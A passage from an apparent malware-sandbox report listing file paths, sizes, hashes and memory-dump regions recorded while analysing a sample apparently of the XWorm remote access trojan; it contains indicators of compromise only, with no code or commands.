                                                                                                                        Filesize

                                                                                                                        294B

                                                                                                                        MD5

                                                                                                                        5959e9104ceb76e256eb4785847eeb3d

                                                                                                                        SHA1

                                                                                                                        36c105fb5e54aa6de3771fa0972a7744fc129e50

                                                                                                                        SHA256

                                                                                                                        7145c44e7d38514e109fd232a900eabfbf767e6c2a296469da47b8d8e26b7c13

                                                                                                                        SHA512

                                                                                                                        75e4e42bc87866b9a306ad2065fbecbf6a7301770df4f1fc4a55f61b76e8e1ee6164d069c03d581c3f42ba380d72f24d454f305d0c7ea98b889fef71806bcf4c

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vbcA8D3B265ADDE41558B7BD1AEBDBAFFB7.TMP

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        b70192bdfa82953d23893557b94122f2

                                                                                                                        SHA1

                                                                                                                        4fd73efd6a6b28f57df1dde6a4241526c5b0fb60

                                                                                                                        SHA256

                                                                                                                        6443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4

                                                                                                                        SHA512

                                                                                                                        6dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da

                                                                                                                      • C:\Users\Admin\Desktop\XWorm.exe

                                                                                                                        Filesize

                                                                                                                        41KB

                                                                                                                        MD5

                                                                                                                        e83b39b996bbf956188ad2990a9a54da

                                                                                                                        SHA1

                                                                                                                        a0dad306c6c1df854a8073eafd08215e041161d0

                                                                                                                        SHA256

                                                                                                                        111d94fb61443e2e6e34b97b8819a6e52bf153a1363c8d2c232c28c75e4c78eb

                                                                                                                        SHA512

                                                                                                                        23a70e8c379cab47ad48b7f153f827c24092e8014f08841e33aeab441c155d59888fd32d8095ce7093926b2ac80983285c2cc20414087d10849b4a32cf87221e

                                                                                                                      • C:\Users\Admin\Desktop\doc.txt

                                                                                                                        Filesize

                                                                                                                        4B

                                                                                                                        MD5

                                                                                                                        098f6bcd4621d373cade4e832627b4f6

                                                                                                                        SHA1

                                                                                                                        a94a8fe5ccb19ba61c4c0873d391e987982fbbd3

                                                                                                                        SHA256

                                                                                                                        9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08

                                                                                                                        SHA512

                                                                                                                        ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff

                                                                                                                      • C:\Users\Admin\Downloads\XWorm-RAT-main.zip:Zone.Identifier

                                                                                                                        Filesize

                                                                                                                        26B

                                                                                                                        MD5

                                                                                                                        fbccf14d504b7b2dbcb5a5bda75bd93b

                                                                                                                        SHA1

                                                                                                                        d59fc84cdd5217c6cf74785703655f78da6b582b

                                                                                                                        SHA256

                                                                                                                        eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                                                                                        SHA512

                                                                                                                        aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                                                                                      • memory/560-568-0x000001E46DAC0000-0x000001E46E082000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        5.8MB

                                                                                                                      • memory/560-574-0x000001E470520000-0x000001E470596000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        472KB

                                                                                                                      • memory/560-575-0x000001E4704E0000-0x000001E4704FE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        120KB

                                                                                                                      • memory/560-576-0x000001E470500000-0x000001E47050A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/1116-540-0x0000000006320000-0x00000000068C6000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        5.6MB

                                                                                                                      • memory/1116-539-0x0000000000FF0000-0x0000000001232000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.3MB

                                                                                                                      • memory/1508-587-0x0000021143010000-0x000002114307A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        424KB

                                                                                                                      • memory/1508-597-0x0000021143FC0000-0x00000211442EE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        3.2MB

                                                                                                                      • memory/1508-627-0x00000211444B0000-0x000002114455A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        680KB

                                                                                                                      • memory/1508-619-0x0000021143310000-0x0000021143322000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        72KB

                                                                                                                      • memory/1508-595-0x0000021143290000-0x00000211432CA000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        232KB

                                                                                                                      • memory/1508-592-0x0000021143220000-0x0000021143242000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        136KB

                                                                                                                      • memory/1508-590-0x00000211431D0000-0x0000021143220000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        320KB

                                                                                                                      • memory/1508-589-0x00000211430D0000-0x0000021143182000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        712KB

                                                                                                                      • memory/1508-596-0x0000021143250000-0x0000021143276000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        152KB

                                                                                                                      • memory/1508-628-0x00000211433A0000-0x00000211433DE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248KB

                                                                                                                      • memory/1588-2182-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2181-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2185-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2190-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2189-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2188-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2187-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2186-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1588-2183-0x0000026C4C710000-0x0000026C4C711000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-974-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-965-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-964-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-966-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-970-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-976-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-975-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-973-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-972-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3744-971-0x0000014D7E0E0000-0x0000014D7E0E1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4240-821-0x0000000010A80000-0x0000000010B02000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        520KB

                                                                                                                      • memory/4240-554-0x0000000005D50000-0x0000000005DE2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/4240-547-0x0000000005CB0000-0x0000000005D4C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        624KB

                                                                                                                      • memory/4240-563-0x00000000090E0000-0x0000000009146000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        408KB

                                                                                                                      • memory/4240-556-0x0000000005F90000-0x0000000005FE6000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        344KB

                                                                                                                      • memory/4240-543-0x0000000000C80000-0x0000000001312000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.6MB

                                                                                                                      • memory/4240-555-0x0000000005C80000-0x0000000005C8A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/4796-1026-0x00000000007A0000-0x00000000007AA000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/4796-1102-0x00000000007C0000-0x00000000007C8000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/4796-2057-0x00000000007E0000-0x00000000007EE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/4796-2058-0x00000000007F0000-0x00000000007FC000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        48KB

                                                                                                                      • memory/4796-817-0x0000000000080000-0x0000000000090000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/4796-2066-0x00000000008F0000-0x00000000008F8000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/4796-822-0x0000000002210000-0x000000000221A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/4796-823-0x000000001CC00000-0x000000001D128000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        5.2MB

                                                                                                                      • memory/4796-827-0x000000001B390000-0x000000001B41E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        568KB